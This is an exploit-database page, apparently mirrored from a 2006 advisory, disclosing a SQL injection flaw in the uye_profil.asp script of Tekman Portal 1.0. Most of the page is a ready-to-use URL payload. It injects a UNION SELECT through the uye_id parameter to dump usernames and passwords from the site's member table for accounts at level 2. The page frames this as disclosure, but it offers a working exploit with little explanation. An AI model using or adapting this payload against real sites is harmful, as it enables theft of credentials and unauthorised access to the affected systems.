Tekman Portal 1.0 (tr) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Tekman Portal 1.0 (tr) Remote SQL Injection Vulnerability
# Published : 2006-09-19
# Author : Fix TR
# Previous Title : Pie Cart Pro (Inc_Dir) Remote File Include Vulnerabilities
# Next Title : Simple Discussion Board 0.1.0 Remote File Include Vulnerability

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ Tekman Portal v1.0 (tr) SQL Injection Vulnerability    +
+ Author  : Fix TR                                       +
+ Site    : www.hack.gen.tr                              +
+ Contact : fixtr[at]bsdmail.com                         +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

+ Download: http://www.aspindir.com/goster/4425
+ Version : 1.0
+ Bug In  : uye_profil.asp
+ Risk    : High


+ Exp.

http://[Target]/[Path]/uye_profil.asp?uye_id=1+union+select+1,kadi,null,seviye,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+uyeler+Where+seviye+like+2

# www.Syue.com [2006-09-19]